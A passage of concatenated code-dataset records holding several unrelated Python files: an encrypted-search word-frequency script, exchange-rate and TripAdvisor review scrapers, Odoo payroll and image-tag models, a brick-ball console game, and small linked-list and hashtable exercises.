get_list_file_name(link_file, list_file_comparing=[]):\n\tlist_file_ = []\n\tfor file_name in link_file:\n\t\tif file_name in list_file_comparing:\n\t\t\tcontinue\n\t\telif len(list_file_) < 10:\n\t\t\tlist_file_.append(file_name)\n\t\telse:\n\t\t\treturn list_file_\n\ndef creating_dir(path_name):\n\tif 'AAA' in path_name:\n\t\tif not os.path.exists(path_name):\n\t\t\tos.makedirs(path_name)\n\t\treturn os.path.abspath(path_name)\n\telse:\n\t\tlist_directory = []\n\t\tfor i in xrange(1,4):\n\t\t\tcurr_path_name = os.path.join(path_name, str(i))\n\t\t\tif not os.path.exists(curr_path_name):\n\t\t\t\tos.makedirs(curr_path_name)\n\t\t\tlist_directory.append(os.path.abspath(curr_path_name))\n\t\treturn list_directory\n\n\ndef prepare_writing_file(list_file_training, list_file_testing\n\t, directory_training, directory_testing):\n\n\tlist_word_percentage_training, list_word_count_training, total_words_training = writing_file(\n\t\tlist_file_training, directory_training)\n\n\tlist_word_percentage_testing, list_word_count_testing, total_words_testing = writing_file(\n\t\tlist_file_testing, directory_testing)\n\n\treturn list_word_count_training, list_word_percentage_training, list_word_count_testing, list_word_percentage_testing, total_words_training, total_words_testing\n\ndef writing_file(list_file_, directory):\n\tlist_word_percentage = []\n\tlist_word_count = []\n\n\tfor i in xrange(1,4):\n\t\tword_count = {}\n\t\ttotal_words = 0\n\t\tcase_directory = directory[i-1]\n\t\tfile_name = str(i) + '.txt'\n\t\twith open(os.path.join(case_directory, file_name), 'wb') as f:\n\t\t\tfor file_name in list_file_:\n\t\t\t\tcounting, word_count = count_and_create_list(file_name, word_count, i)\n\t\t\t\ttotal_words += counting\n\n\t\t\tword_percentage = percentage_plain_text(word_count, total_words)\n\t\t\tlist_word_percentage.append(word_percentage)\n\t\t\tlist_word_count.append(word_count)\n\n\t\t\tsort = sorted( ((v,k) for k,v in word_percentage.iteritems()), reverse=True)\n\t\t\tfor key, value in sort:\n\t\t\t\tf.write(str(key))\n\t\t\t\tf.write(':')\n\t\t\t\tf.write(str(value))\n\t\t\t\tf.write('\\n')\n\t\t\tf.close()\n\treturn list_word_percentage, list_word_count, total_words\n\ndef count_and_create_list(file_name, word_count, testing_case):\n\tcount = 0\n\twith open(file_name) as f:\n\t\tfor sentences in f.readlines():\n\t\t\tif len(sentences.split()) - 2 != testing_case:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tcount += 1\n\t\t\t\tcur_words = ''\n\t\t\t\twords = ' '.join(sentences.lower().split()[2:])\n\t\t\t\tif len(words.split()) == 1:\n\t\t\t\t\tcur_words = regex_words(words)\n\t\t\t\telse:\n\t\t\t\t\tfor word in words.split():\n\t\t\t\t\t\tcur_words += regex_words(word) + ' '\n\t\t\t\tif len(words.split()) != len(cur_words.split()) or cur_words == '':\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\twords = cur_words\n\t\t\t\tif words not in word_count:\n\t\t\t\t\tword_count[words] = 1\n\t\t\t\telse:\n\t\t\t\t\tword_count[words] += 1\n\t\tf.close()\n\treturn count, word_count\n\ndef regex_words(word):\n\tregex = re.compile('[^a-z]')\n\ttesting_word = regex.sub('', word)\n\tif testing_word != '':\n\t\treturn testing_word\n\treturn ''\n\ndef percentage_plain_text(word_count, total_words):\n\tword_percent = {}\n\tfor word, appearance in word_count.items():\n\t\tprobability_success = float(appearance)/float(total_words)\n\t\tword_percent.update({word:probability_success})\n\treturn word_percent\n\ndef create_tag(list_wordcount_training, name, directory_AAA):\n\tE = Encryption('chilun1403', 'chilun2411')\n\tsalt = binascii.hexlify(Crypto.Random.get_random_bytes(16))\n\tlist_number_word_tag = []\n\n\tfor i in range(len(list_wordcount_training)):\n\t\tlist_word_tag = {}\n\t\ttag_word = {}\n\t\tfor word, value in list_wordcount_training[i].items():\n\t\t\tIV = E._create_IV('text', salt)\n\t\t\tword_tag = E.PRF(word)\n\t\t\tlist_word_tag.update({word_tag:value})\n\t\t\ttag_word.update({word:word_tag})\n\t\tlist_number_word_tag.append(list_word_tag)\n\n\t\tfile_name = str(i+1) + name + '.txt'\n\n\t\twith open(os.path.join(directory_AAA, file_name), 'wb') as f:\n\t\t\tfor key, value in tag_word.items():\n\t\t\t\tf.write(str(key))\n\t\t\t\tf.write(':')\n\t\t\t\tf.write(str(value))\n\t\t\t\tf.write('\\n')\n\t\t\tf.close()\n\treturn list_number_word_tag\n\ndef probability_tag(dict_tag, guess_word, guess_word_percent_success, total_words\n\t, directory, name):\n\tfile_name = guess_word + name + '.txt'\n\twith open(os.path.join(directory, file_name), 'wb') as f:\n\t\tprint_tag = {}\n\t\tfor word, appearance in dict_tag.items():\n\t\t\tword_probability = binom.pmf(appearance, total_words, guess_word_percent_success)\n\t\t\tprint_tag.update({word:word_probability})\n\n\t\tsort = sorted( ((v,k) for k,v in print_tag.iteritems()), reverse=True)\n\n\t\tfor key, value in sort:\n\t\t\tf.write(str(key))\n\t\t\tf.write(':')\n\t\t\tf.write(str(value))\n\t\t\tf.write('\\n')\n\t\tf.close\n\n\nif __name__ == '__main__':\n\n\tlist_file_training = get_list_file_name(sorted(glob.glob(directory)), [])\n\tlist_file_testing = get_list_file_name(sorted(glob.glob(directory)), list_file_training)\n\n\tdirectory_training = creating_dir(path_name_training)\n\tdirectory_testing = creating_dir(path_name_testing)\n\tdirectory_AAA = creating_dir(path_name_AAA)\n\n\tlist_word_count_training, list_word_percentage_training, list_word_count_testing, list_word_percentage_testing, total_words_training, total_words_testing = prepare_writing_file(\n\t\tlist_file_training, list_file_testing, directory_training, directory_testing)\n\n\t#list_number_word_tag_training = create_tag(list_word_count_training, 'training', directory_AAA)\n\n\tlist_number_word_tag_testing = create_tag(list_word_count_testing, 'next_testing_probability_training', directory_AAA)\n\n\t'''for i in range(len(list_word_percentage_training)):\n\t\tfor word, value in list_word_percentage_training[i].items():\n\t\t\tprobability_tag(list_number_word_tag_training[i], word, value, total_words_training\n\t\t\t\t, directory_training[i], 'training')'''\n\n\t'''for i in range(len(list_word_percentage_testing)):\n\t\tfor word, value in list_word_percentage_testing[i].items():\n\t\t\tprobability_tag(list_number_word_tag_testing[i], word, value, total_words_testing\n\t\t\t\t, directory_testing[i], 'testing')'''\n\n\tfor i in xrange(len(list_word_percentage_testing)):\n\t\tfor word, value in list_word_percentage_testing[i].items():\n\t\t\tif word in list_word_percentage_training[i]:\n\t\t\t\tprobability_tag(list_number_word_tag_testing[i], word, list_word_percentage_training[i][word],\n\t\t\t\t\ttotal_words_testing, directory_testing[i], 'testing')\n\t\t\telse:\n\t\t\t\tprobability_tag(list_number_word_tag_testing[i], word, 0, total_words_testing,\n\t\t\t\t\tdirectory_testing[i], 'testing')","repo_name":"vunhatminh241191/Simple-Searchable-Encrypted-Enail","sub_path":"testing_update.py","file_name":"testing_update.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3260322236","text":"# Utilities\nimport pandas as pd\n\n# Models\nfrom models.tasas_cambio import Tasas_Cambio\n\n# Custom Functions\nfrom utils.tasas_bcv import get_book, get_data_sheets\n\n# Conexion a base de datos\nimport db\n\n# fecha maxima a partir de la cual buscar los datos\nquery_fecha_max = \"\"\"SELECT\tMAX(fecha)\nFROM public.tasas_cambio\nWHERE fuente = 'BCV' \"\"\"\n\nfecha_max = pd.read_sql(query_fecha_max, db.engine)\nfecha_max = pd.to_datetime(fecha_max['max'][0]).date()\n\n# Paginas para colsultar\nHOME_URL = 'http://www.bcv.org.ve/estadisticas/otras-monedas'\n\ndata = pd.DataFrame()\nfor i in range(1,11):\n XPATH_TO_FILE = '//*[@id=\"block-system-main\"]/div/div[1]/div/div[1]/table/tbody/tr[{}]/td[2]/span/a'.format(i)\n book = get_book(HOME_URL,XPATH_TO_FILE)\n sheets = book.sheet_names\n\n for sheet in sheets:\n sheet = book.parse(sheet)\n for row in get_data_sheets(sheet).itertuples():\n if row.Fecha_Valor.date() > fecha_max:\n tasa = Tasas_Cambio(\n row.Fecha_Valor,\n row.Moneda,\n 'BCV',\n row.Tasa,\n row.Pais\n )\n tasa.insert_data()\n else:\n break;\n \n book.close()","repo_name":"bgonzalez6/scraping_tasas_bcv","sub_path":"get_tasas_bcv.py","file_name":"get_tasas_bcv.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71713296244","text":"from math import floor\r\nimport string\r\nfrom unittest import result\r\nball=1\r\n\r\n\r\ndef stage():\r\n for i in range(0,size):\r\n for j in range(0,size):\r\n if(i==0 or j==0 or j==size-1):\r\n li[i][j]=\"W\"\r\n elif(i==size-1 and not(j==size-1) and not(j==floor(size/2))):\r\n li[i][j]=\"G\"\r\n elif(i==size-1 and j==floor(size/2)):\r\n li[i][j]=\"o\"\r\n\r\ndef display():\r\n for i in li:\r\n for j in i:\r\n print(j,end=\" \")\r\n print()\r\n print(\"Ball count is \",ball,\".\",sep=\"\")\r\n\r\ndef brick():\r\n binput=list(map(int,input(\"Enter the brick's position and brick type\\n (1,2,3,4 for DE,5 for DS):\")))\r\n li[binput[0]][binput[1]]=binput[2]\r\n cont=input(\"Do you want to continue(Y or N)?\")\r\n if cont=='Y':\r\n brick()\r\n elif cont=='N':\r\n global ball\r\n ball=int(input(\"Enter ball count:\"))\r\n\r\n\r\ndef direction():\r\n d=input(\"Enter the direction in which the ball needs to traverse:\")\r\n if d==\"ST\":\r\n for i in range(size-2,-1,-1):\r\n j=floor(size/2)\r\n if destroy(i,j)==1:\r\n return\r\n if i==0:\r\n global ball\r\n ball-=1\r\n\r\n elif d==\"LD\":\r\n i=size-1\r\n j=floor(size/2)\r\n count=0\r\n while count<2:\r\n i-=1\r\n j-=1\r\n if destroy(i,j)==1:\r\n return\r\n elif li[i][j]=='W':\r\n count+=1\r\n while count<2:\r\n if destroy(i,j)==1:\r\n return\r\n elif li[i][j]=='W':\r\n count+=1\r\n break\r\n else:\r\n j-=1\r\n if count==2:\r\n ball-=1\r\n \r\n elif d==\"RD\":\r\n i=size-1\r\n j=floor(size/2)\r\n count=0\r\n while count<2:\r\n i+=1\r\n j+=1\r\n if destroy(i,j)==1:\r\n return\r\n elif li[i][j]=='W':\r\n count+=1\r\n while count<2:\r\n if destroy(i,j)==1:\r\n return\r\n elif li[i][j]=='W':\r\n count+=1\r\n break\r\n else:\r\n j+=1\r\n if count==2:\r\n ball-=1\r\n \r\ndef destroy(i,j):\r\n if li[i][j]==5:\r\n li[i][j]=\" \"\r\n li[i][j-1]=\" \"\r\n li[i][j+1]=\" \"\r\n li[i-1][j]=\" \"\r\n li[i-1][j-1]=\" \"\r\n li[i-1][j+1]=\" \"\r\n li[i+1][j]=\" \"\r\n li[i+1][j-1]=\" \"\r\n li[i+1][j+1]=\" \"\r\n return 1\r\n elif li[i][j]==4:\r\n li[i][j]=\" \"\r\n li[i][j-1]=\" \"\r\n li[i][j+1]=\" \"\r\n return 1\r\n elif li[i][j]==3:\r\n li[i][j]=2\r\n return 1\r\n elif li[i][j]==2:\r\n li[i][j]=1\r\n return 1\r\n elif li[i][j]==1:\r\n li[i][j]=\" \"\r\n return 1\r\n\r\ndef result():\r\n count=0\r\n for i in li:\r\n for j in i:\r\n if j not in('W','G','o',' '):\r\n count+=1\r\n if count>0:\r\n return True\r\n print(\"You won\")\r\n return False\r\n\r\nif __name__==\"__main__\":\r\n size=int(input(\"Enter size of NXN matrix:\"))\r\n li=[[\" \" for __ in range(size)] for _ in range(size)] \r\n stage()\r\n brick()\r\n display()\r\n while result():\r\n direction()\r\n display()\r\n if ball==0:\r\n print(\"Game over\")\r\n break","repo_name":"Mehul541/Brick-Ball","sub_path":"brick_ball.py","file_name":"brick_ball.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21986757315","text":"\r\nclass Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n\r\n\r\nclass linked_list:\r\n def __init__(self):\r\n self.head = None\r\n\r\n def push(self, new_data):\r\n new_node = Node(new_data)\r\n new_node.next = self.head\r\n self.head = new_node\r\n\r\n def get_count_rec(self, node):\r\n if (not node):\r\n return 0\r\n else:\r\n return 1 + self.get_count_rec(node.next)\r\n\r\n def get_count(self):\r\n return self.get_count_rec(self.head)\r\n\r\n\r\nif __name__ == '__main__':\r\n llist = linked_list()\r\n llist.push(1)\r\n llist.push(3)\r\n llist.push(1)\r\n llist.push(2)\r\n llist.push(1)\r\n print('Count of nodes is :', llist.get_count())\r\n","repo_name":"dannygirl0211/SOFTWARE-DESIGN-LAB-EXERCISES","sub_path":"SOFTWARE_DESIGN_2-A_ESPORSADO,DANNYLYN_LAB_REPORT#3/7.3.py","file_name":"7.3.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12213817846","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom bs4 import BeautifulSoup, Comment\nimport requests\nimport re\nimport data_access as da\nimport datetime\nimport time\n\noutput_file = \"tripadvisor_output.csv\"\nreview_counter=0;\nurl =\"https://www.tripadvisor.com.sg/Hotel_Review-g294265-d1770798-Reviews-or{data_offset}-Marina_Bay_Sands-Singapore.html\"\n#f = open(output_file, \"w\")\n\n\n\"\"\"-------------------------------------------------------\nHelper Function 1:\nRemove non-ascii characters from text string\n----------------------------------------------------------\"\"\"\ndef remove_nonascii(text):\n\tif text is not None:\n\t\treturn text.encode(\"ascii\", \"ignore\").decode(\"ascii\").strip()\n\t\t#return text.encode(\"utf-8\")\n\telse:\n\t\treturn text\n\n\t\n\"\"\"-------------------------------------------------------------------\nHelper Function 2:\nExtract country from location. Note: Country is after the last commas\n-----------------------------------------------------------------------\"\"\"\ndef extract_country(location):\n\tif location is None:\n\t\treturn\n\t\n\tcountry = location.split(\",\")[-1].strip()\n\treturn country\n\n\n\"\"\"---------------------------------------------------------------\nHelper function 3:\nDate comparison. Note that both dates should be in string format.\nResult: True - date_new is newer\n False - date_new is older or same date\n-------------------------------------------------------------------\"\"\"\ndef compare_date_isnewer(date_new, date_original):\n\tnew_date_new = time.strptime(date_new, \"%d/%m/%Y\")\n\tnew_date_original = time.strptime(date_original, \"%d/%m/%Y\")\n\t\n\tif (new_date_new <= new_date_original):\n\t\treturn False\n\telse:\n\t\treturn True\n\t\n\t\n\t\n\n\t\n\"\"\"----------------------------------\nFunction 1:\nGet username using uid \n-------------------------------------\"\"\"\ndef get_username(uid):\n\tif uid is None:\n\t\treturn\n\n\tresponse = requests.get(\"https://www.tripadvisor.com.sg/MemberOverlay?\", params={\"uid\":uid})\n\toverlay = BeautifulSoup(response.content, \"html.parser\")\n\tusername = overlay.find(\"a\")[\"href\"]\n\treturn username\n\n\"\"\"----------------------------------------\nFunction 2:\nGet user info using username\n-------------------------------------------\"\"\"\ndef get_user_info(username):\n\tif username is None:\n\t\treturn\n\t\n\tresponse = requests.get(\"https://www.tripadvisor.com.sg\" + username)\n\tcontainer = BeautifulSoup(response.content, \"html.parser\")\n\t\n\treviews = container.find(\"a\", {\"name\":\"reviews\"}).string\n\treviews = re.search(\"(.*) Review\", reviews).group(1)\n\tprint(\"Reviews: %s\" % reviews)\n\t\n\thelpful_votes = container.find(\"a\", {\"name\":\"lists\"})\n\tif helpful_votes is None:\n\t\thelpful_votes = 0\n\telse:\n\t\thelpful_votes = helpful_votes.string\n\t\thelpful_votes = re.search(\"(.*) Helpful\", helpful_votes).group(1)\n\tprint(\"Helpful vote: %s\" % helpful_votes)\n\t\n\ttravel_style=[]\n\ttempstyles = container.find_all(\"div\", class_=\"tagBubble\")\n\tfor a_style in tempstyles:\n\t\ttravel_style.append(a_style.get_text().strip())\n\tprint(\"Travel style: %s\" % travel_style)\n\t\n\tpoints = container.find(\"div\", class_=\"points\").string.strip()\n\tprint(\"Points: %s\" % points)\n\t\n\t\n\tlevel = container.find(\"div\", class_=\"level\")\n\tif level is None:\n\t\tlevel = 0\n\telse:\n\t\tlevel = level.find(\"span\").string\n\tprint(\"Level: %s\" % level)\n\t\n\tbadges = container.find_all(\"div\", class_=\"badgeItem\")\n\tthe_badges = []\n\tfor a_badge in badges:\n\t\tthe_badges.append(a_badge.get_text())\n\t\tprint(\"Badge: %s\" % a_badge.get_text())\n\t\n\treturn (int(reviews), int(helpful_votes), travel_style,\n\t\t\tint(points.replace(\",\", \"\")), int(level), the_badges)\n\n\n\"\"\"-----------------------\nFunction 3:\nProcess page\n--------------------------\"\"\"\ndef process_page(url, last_inserted_date):\n\tif url is None:\n\t\treturn\n\t\n\tprint(\"Processing %s\" % url)\n\t\n\tto_continue_scraping = True\n\t\n\t# Step 1: \n\thtml = requests.get(url)\n\tsoup = BeautifulSoup(html.content, \"html.parser\")\n\t\n\t# Step 2: Get the review_id\n\treview_ids = soup.find_all(\"div\", class_=\"reviewSelector\")\n\treview_id_list = list()\n\tfor a_reviewid in review_ids:\n\t\treview_id_list.append(a_reviewid[\"data-reviewid\"])\n\t#print(review_id_list)\n\t\n\t# Step 3: Convert review_id_list to commas seperated payload json\n\tpayload = \",\".join(review_id_list)\n\tpayload = {\n\t\t\"reviews\": payload\n\t}\n\t#print(\"Payload: %s\\n\" % payload)\n\t\n\t# Step 4: To expand out \"More\" so that the whole review can be seen\n\tr = requests.post(\n\t\turl='https://www.tripadvisor.com.sg/OverlayWidgetAjax?Mode=EXPANDED_HOTEL_REVIEWS&metaReferer=Attraction_Review',\n\t\tdata=payload,\n\t\theaders={\n\t\t\t'X-Requested-With': 'XMLHttpRequest'\n\t\t}\n\t)\n\t\n\t# Step 4: Get the new url\n\tsoup = BeautifulSoup(r.content, \"html.parser\")\n\t\t\n\t\n\tcontainer = soup.find_all(\"div\", class_=\"review\")\n\n\treview_list = []\n\tuser_profile_list = []\n\tfor a_container in container:\n\t\tglobal review_counter\n\t\treview_counter = review_counter+1;\n\t\tprint(\"S/N: %d\" % review_counter)\n\t\t\t\n\t\tscreen_name = a_container.find(\"span\", class_=\"scrname\").string\n\t\tscreen_name = remove_nonascii(screen_name)\n\t\tprint(\"Screen name: %s\" % screen_name)\n\t\t\n\t\tuser_location = a_container.find(\"span\", class_=\"userLocation\")\n\t\tif (user_location) is None:\n\t\t\tuser_location = \"None\"\n\t\telse:\n\t\t\tuser_location = remove_nonascii(user_location.string)\n\t\t\tuser_location = extract_country(str(user_location))\n\t\tprint(\"User location: %s\" % user_location)\n\t\t\n\t\t\n\t\t# Get rating: \t\n\t\trating = a_container.find(\"span\", class_=\"ui_bubble_rating\")[\"class\"][1][7]\n\t\tprint(\"Rating: %s\" % rating)\n\t\t\n\t\trating_date = a_container.find(\"span\", class_=\"ratingDate\")[\"title\"]\n\t\t\n\t\t# Condition: if entry date is older, stop processing all the remaining entries\n\t\ttemp_rating_date = datetime.datetime.strptime(rating_date, \"%d %B %Y\").strftime(\"%d/%m/%Y\")\n\t\tif not compare_date_isnewer(temp_rating_date, last_inserted_date):\n\t\t\tto_continue_scraping = False\n\t\t\tbreak;\n\t\t\t\n\t\tprint(\"Rating date: %s\" % rating_date)\n\t\t\n\t\ttitle = remove_nonascii(a_container.find(\"span\", class_=\"noQuotes\").string)\n\t\tprint(\"Title: %s\" % title)\n\t\n\t\t\n\t\t\n\t\tentry = remove_nonascii(a_container.find(\"p\", class_=\"partial_entry\").get_text())\n\t\tprint(\"Entry: %s\" % entry)\n\t\t\n\t\t\n\t\t\n\t\tuid = a_container.find(\"div\", class_=\"memberOverlayLink\")\n\t\tif uid is None:\n\t\t\tcontinue\n\t\tuid = uid[\"id\"]\t\n\t\tuid = re.search(\"UID_(.*)-SRC*\", uid).group(1)\n\t\tprint(\"uid: %s\" % uid)\n\t\tusername = str(get_username(uid))\n\t\tprint(\"username: %s\" % username)\n\t\t\n\t\t# Convert all parameters to their suitable types accordingly\n\t\tscreen_name = str(screen_name)\n\t\tuser_location = str(user_location)\n\t\trating = int(rating)\n\t\trating_date = datetime.datetime.strptime(rating_date, \"%d %B %Y\")\n\t\ttitle = str(title)\n\t\tentry = str(entry)\n\t\tuid = str(uid)\n\t\tusername = str(username)\n\t\t\n\t\t(reviews, helpful_votes, travel_style, points, level, the_badges) = get_user_info(username)\n\n\t\treview = {\n\t\t\t'_id' \t\t\t: uid ,\n\t\t\t'screen_name' \t: screen_name,\n\t\t\t'location' \t\t: user_location,\n\t\t\t'rating' \t\t: rating,\n\t\t\t'rating_date' \t: rating_date,\n\t\t\t'title' \t\t: title,\n\t\t\t'entry' \t\t: entry,\n\t\t\t'user_id' \t\t: username\n\t\t}\n\n\t\tuser_profile = {\n\t\t\t'_id' \t\t\t: username,\n\t\t\t'no_reviews' \t: reviews,\n\t\t\t'helpful_votes' : helpful_votes,\n\t\t\t'travel_styles' : travel_style,\n\t\t\t'points'\t\t: points,\n\t\t\t'level'\t\t\t: level,\n\t\t\t'badges'\t\t: the_badges\n\t\t}\n\n\t\t\n\t\t# Add to list\n\t\treview_list.append(review)\n\t\tuser_profile_list.append(user_profile)\n\t\t\n\t\tprint(\"\")\n\t\n\t# Send list to mongodb\n\tif (len(review_list)!=0):\n\t\tda.insert(\"review1\", review_list)\n\tif (len(user_profile_list)!=0):\n\t\tda.insert(\"user_profile1\", user_profile_list)\n\t\n\treturn to_continue_scraping\n\t\n\t\n\"\"\"-------------------------------------------------\nFunction 4:\n[1] Find out last page offset\n[2] Loop through all pages till the last page\n----------------------------------------------------\"\"\"\ndef loop_pages(url):\n\t# Step 1: Get last inserted date from mongodb\n\tlast_inserted_date = da.get_last_inserted_date(); # e.g 22/08/2017\n\tif last_inserted_date is None:\n\t\tlast_inserted_date = \"01/01/1980\"\t\t# arbitary date\n\tprint(\"Last inserted date: %s\" % last_inserted_date)\n\t\n\t\n\t# Step 2: Find out the last page offset\n\tdata_offset=0\n\tcurrent_url = url.format(data_offset = 0)\n\t\n\thtml = requests.get(current_url)\n\tsoup = BeautifulSoup(html.content, \"html.parser\")\n\t\n\tlast_data_offset = int(soup.find(\"span\", class_=\"last\").get(\"data-offset\"))\n\tprint(last_data_offset)\n\t\n\t# Step 3: Loop through the pages till the last page\n\tfor current_offset in range(0, last_data_offset+1, 5):\n\t\tcurrent_url = url.format(data_offset = current_offset)\n\t\tto_continue_scraping = process_page(current_url, last_inserted_date)\n\t\t# Do not continue scraping\n\t\tif not to_continue_scraping:\n\t\t\tprint(\"\\nFinish scraping till last inserted date...\")\n\t\t\tbreak\n\t\t\n\t\t\n\"\"\"----------------------\nStart of main program\n-------------------------\"\"\"\nimport time, sys\ntry:\n\tloop_pages(url)\nexcept KeyboardInterrupt:\n\t#f.close()\n\tprint(\"\\t\\tFile closed successfully. Bye.\")\nexcept:\n\t#f.close()\n\tprint(\"\\t\\tException caught. File closed successfully. Bye.\")\n\t\n\tprint(sys.exc_info()[0])\n\traise\n\t\n\t\n\n\n\n\t\n\t\n","repo_name":"kdung/attractions_analysis","sub_path":"user_reviews_crawler.py","file_name":"user_reviews_crawler.py","file_ext":"py","file_size_in_byte":8958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32624300446","text":"from odoo import api, fields, models\n\n\nclass ImageTag(models.Model):\n _inherit = \"image.tag\"\n\n @api.model\n def _get_default_apply_on(self):\n active_model = self.env.context.get(\"active_model\")\n return (\n \"product\"\n if active_model == \"product.image.relation\"\n else \"category\"\n if active_model == \"category.image.relation\"\n else super()._get_default_apply_on()\n )\n\n apply_on = fields.Selection(\n selection_add=[(\"product\", \"Product\"), (\"category\", \"Category\")],\n ondelete={\"product\": \"cascade\", \"category\": \"cascade\"},\n )\n","repo_name":"OCA/storage","sub_path":"fs_product_multi_image/models/image_tag.py","file_name":"image_tag.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"76"} +{"seq_id":"31296287716","text":"\"\"\" This script is used for loading and preliminarily processing the data. \"\"\"\nimport csv\nimport numpy as np\n\nDATA_PATH = \"bid_data.csv\"\n\ndef load_data(data_path):\n \"\"\" Given a data_path, this function reads a csv file into a np.array. \"\"\"\n with open(data_path) as csv_file: # Reads the csv file into a list.\n csv_reader = csv.reader(csv_file, delimiter=\",\")\n rows = list(csv_reader)\n \n del rows[0] # Remove the header, which are \"value\" and \"bid\".\n \n rows = remove_empty_rows(rows) # Remove empty rows.\n # Convert data from string to float format\n rows = [[float(a) for a in item] for item in rows]\n return np.array(rows)\n \n\ndef remove_empty_rows(array_x):\n \"\"\" Given an array_x, removes all rows that contain an empty data. \"\"\"\n output = [x for x in array_x if all(elem != \" \" for elem in x)]\n return output","repo_name":"tzk524/396_online_markets_project_2","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6099821681","text":"from odoo import _, api, fields, models\nfrom odoo.exceptions import UserError\n\n\nclass HrPayslipLine(models.Model):\n _name = \"hr.payslip.line\"\n _inherit = \"hr.salary.rule\"\n _description = \"Payslip Line\"\n _order = \"contract_id, sequence\"\n\n slip_id = fields.Many2one(\n \"hr.payslip\", string=\"Pay Slip\", required=True, ondelete=\"cascade\"\n )\n date_from = fields.Date(\"Date From\", related=\"slip_id.date_from\", store=True)\n payslip_run_id = fields.Many2one(\n \"hr.payslip.run\", related=\"slip_id.payslip_run_id\", string=\"Payslip Batch\"\n )\n child_ids = fields.One2many(\n \"hr.payslip.line\", \"parent_line_id\", string=\"Child Payslip Lines\"\n )\n parent_line_id = fields.Many2one(\n \"hr.payslip.line\",\n string=\"Parent Payslip Line\",\n compute=\"_compute_parent_line_id\",\n store=True,\n )\n salary_rule_id = fields.Many2one(\"hr.salary.rule\", string=\"Rule\", required=True)\n employee_id = fields.Many2one(\"hr.employee\", string=\"Employee\", required=True)\n contract_id = fields.Many2one(\n \"hr.contract\", string=\"Contract\", required=True, index=True\n )\n rate = fields.Float(string=\"Rate (%)\", digits=\"Payroll Rate\", default=100.0)\n amount = fields.Float(digits=\"Payroll\")\n quantity = fields.Float(digits=\"Payroll\", default=1.0)\n total = fields.Float(\n compute=\"_compute_total\",\n string=\"Total\",\n digits=\"Payroll\",\n store=True,\n )\n allow_edit_payslip_lines = fields.Boolean(\n \"Allow editing\", compute=\"_compute_allow_edit_payslip_lines\"\n )\n\n def _compute_allow_edit_payslip_lines(self):\n self.allow_edit_payslip_lines = (\n self.env[\"ir.config_parameter\"]\n .sudo()\n .get_param(\"payroll.allow_edit_payslip_lines\")\n )\n\n @api.depends(\"parent_rule_id\", \"contract_id\", \"slip_id\")\n def _compute_parent_line_id(self):\n for line in self:\n if line.parent_rule_id:\n parent_line = line.slip_id.line_ids.filtered(\n lambda l: l.salary_rule_id == line.parent_rule_id\n and l.contract_id == line.contract_id\n and l.slip_id == line.slip_id\n )\n if parent_line and len(parent_line) > 1:\n raise UserError(\n _(\"Recursion error. Only one line should be parent of %s\")\n % line.parent_rule_id.name\n )\n line.parent_line_id = (\n parent_line[0].id if len(parent_line) == 1 else False\n )\n else:\n line.parent_line_id = False\n\n @api.depends(\"quantity\", \"amount\", \"rate\")\n def _compute_total(self):\n for line in self:\n line.total = float(line.quantity) * line.amount * line.rate / 100\n\n @api.model_create_multi\n def create(self, vals_list):\n for values in vals_list:\n if \"employee_id\" not in values or \"contract_id\" not in values:\n payslip = self.env[\"hr.payslip\"].browse(values.get(\"slip_id\"))\n values[\"employee_id\"] = (\n values.get(\"employee_id\") or payslip.employee_id.id\n )\n values[\"contract_id\"] = (\n values.get(\"contract_id\")\n or payslip.contract_id\n and payslip.contract_id.id\n )\n if not values[\"contract_id\"]:\n raise UserError(\n _(\"You must set a contract to create a payslip line.\")\n )\n return super(HrPayslipLine, self).create(vals_list)\n","repo_name":"OCA/payroll","sub_path":"payroll/models/hr_payslip_line.py","file_name":"hr_payslip_line.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"76"} +{"seq_id":"2078322927","text":"# Python program to check if the list contains three consecutive common numbers in Python\r\n\r\n# creating the array\r\narr = [4, 5, 5, 5, 3, 8, 22, 22, 22, 5]\r\n\r\n# size of the list\r\nsize = len(arr)\r\n\r\nfinal_list = []\r\n# looping till length - 2\r\nfor i in range(size - 2):\r\n if arr[i] == arr[i+1] and arr[i+1] == arr[i+2]:\r\n final_list.append(arr[i])\r\n\r\nprint(final_list)\r\n","repo_name":"Just2Deep/python_practice","sub_path":"Practice/Practice35.py","file_name":"Practice35.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11829142527","text":"class Hashtable:\n def __init__(self):\n self.size = 10\n self.keys = [None]*self.size\n self.values = [None]*self.size\n\n def hashfunction(self,key):\n sum = 0\n for letter in range (len(key)):\n sum += ord(key[letter])\n return sum%self.size\n\n def put(self, key,value):\n index = self.hashfunction(key)\n while self.values[index]:\n if self.keys[index] == key:\n self.values[index] = value\n return\n index = (index+1)%self.size\n self.values[index] = value\n self.keys[index] = key\n\n def get(self,key):\n index = self.hashfunction(key)\n while self.keys[index]:\n if self.keys[index] == key:\n return self.values[index]\n index = (index+1)%self.size\n return None\n\nif __name__==\"__main__\":\n table = Hashtable()\n table.put(\"apple\",10)\n table.put(\"orange\", 20)\n table.put(\"car\", 30)\n table.put(\"table\", 40)\n print(table.get(\"H\"))\n 